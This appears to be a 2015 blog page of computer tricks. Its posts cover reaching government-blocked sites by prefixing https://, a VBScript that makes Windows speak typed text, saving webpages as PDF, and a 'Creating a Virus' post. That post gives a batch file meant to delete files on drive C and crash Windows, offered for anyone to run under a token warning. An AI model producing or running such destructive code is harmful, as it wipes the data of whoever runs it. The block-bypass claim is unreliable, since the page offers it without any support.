Translate

पृष्ठ

Thursday, May 21, 2015

How To Access Blocked Website By Department Of Telecom

Like this

“Your requested URL has been blocked as per the directions received from Department of Telecommunications, Government of India. Please contact administrator for more information.”

For a few months, many websites blocked by government and user facing problem to access them,
Same here me also facing this problem too, but here is one solution

                                  Just Put https:// before website blocked

Example :-

 abc.com (Wrong)
https://www.abc.com (Correct)

 And this trick also works on adf.ly.com link's .If your link didn't work, then you can use the same tactics.
If you have any problem about than comment..

Attention 

Caution: - This tutorial only for learning purpose, please do not damage any person, We are not responsible for any damage or action.

Friday, May 15, 2015

Make your Computer Talk


Have you ever wondered how can you make your computer speak whatever you input to it like in the movies? Would it not be fun? If only it was possible! Rejoice, because now it is possible. Well, if you wish to know how to do this, then you have come to the right place. With this trick, you can create a script in Windows which will make your computer speak whatever you input to it.


Steps

1. Open Notepad.
2. Copy and paste the exact blue code given below.


Dim Message, Speak
Message=InputBox("Enter text","Speak")
Set Speak=CreateObject("sapi.spvoice")
Speak.Speak Message


3. Click on File Menu, Save As, select All Types in Save as Type option, and save the file as Speak.vbs or "*.vbs". *ass you wish

4. Double click on the saved file, a window will open like the one in the image. Enter some text in enter text column and click OK.

Now your Computer will speak / talk what you typed in Step 4. Try it yourself

Convert A Webpage To PDF File

help you to read your favourite articles offline. So lets get started.

1. Open the Google Chrome Browser on your PC or MAC
2. Then go to the web page that you want to convert as a PDF.
3. Now press Ctrl+P on Windows PC or Command+P if you are on a Mac to Open the the Print dialog on Chrome Browser.
4. Now Change the destination to “Save As PDF” and hit the save button.
5. The current web page will instantly be downloaded as a PDF document.

Creating a Virus


In this trick we will be creating a virus in notepad using batch file programming. This virus is really simple to create yet very dangerous. Opening this file we delete or format C drive of your computer.

 !! Attention!! Open this virus take your won risk. This is crash your windows.

1. Open Notepad.
2. Copy and Paste this code.

@Echo off
Del C:\ *.* |y


3. Save this file as virus.bat (Name can be anything but ".bat" is important)]
4. It's ready far run.